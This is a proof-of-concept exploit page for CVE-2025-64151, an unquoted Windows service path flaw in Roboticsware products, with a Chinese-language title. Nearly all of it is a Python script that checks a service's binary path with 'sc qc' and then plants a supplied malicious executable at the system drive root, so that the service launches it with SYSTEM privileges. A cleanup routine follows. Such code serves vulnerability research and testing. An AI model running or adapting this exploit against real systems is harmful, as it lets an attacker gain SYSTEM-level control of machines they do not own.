CVE-2025-64151: Roboticsware产品Windows服务路径未加引号导致本地提权漏洞

# CVE-2025-64151 PoC - Unquoted Service Path Exploitation # Target: Roboticsware products with unquoted service paths # This PoC demonstrates privilege escalation via unquoted service path import os import sys import subprocess import shutil def check_vulnerability(service_name, service_path): """ Check if a Windows service has an unquoted path with spaces """ try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Check if path contains spaces and is not quoted for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() if ' ' in path and not path.startswith('"'): print(f"[VULNERABLE] Service '{service_name}' has unquoted path with spaces") print(f"Path: {path}") return True return False except Exception as e: print(f"Error checking service: {e}") return False def exploit_unquoted_path(malicious_exe_path, target_path_component): """ Exploit unquoted service path by placing malicious executable Note: Requires write access to system drive root directory """ # Calculate the path component that Windows will try to execute # For 'C:\Program Files\Roboticsware\app.exe' # Windows tries 'C:\Program.exe' first drive_letter = target_path_component.split(':')[0] + ':\\' malicious_file = os.path.join(drive_letter, target_path_component.split()[0] + '.exe') try: # Copy malicious executable to system drive root shutil.copy2(malicious_exe_path, malicious_file) print(f"[+] Malicious file placed at: {malicious_file}") print(f"[+] When service starts, it will execute our payload with SYSTEM privileges") return True except PermissionError: print("[-] Permission denied - need write access to system drive root") return False except Exception as e: print(f"[-] Error: {e}") return False def cleanup(malicious_filename): """ Remove the planted malicious file """ drive_letter = os.getenv('SystemDrive', 'C:') + '\\' malicious_path = os.path.join(drive_letter, malicious_filename + '.exe') try: if os.path.exists(malicious_path): os.remove(malicious_path) print(f"[+] Cleaned up: {malicious_path}") except Exception as e: print(f"[-] Cleanup error: {e}") if __name__ == '__main__': print("CVE-2025-64151 Unquoted Service Path Exploitation") print("=" * 50) # Example usage service_name = "RoboticswareService" service_path = "C:\\Program Files\\Roboticsware\\service.exe" # Check if vulnerable is_vulnerable = check_vulnerability(service_name, service_path) if is_vulnerable: # Create your malicious executable and specify its path malicious_exe = "C:\\temp\\malicious.exe" # Exploit (requires appropriate privileges) exploit_unquoted_path(malicious_exe, service_path)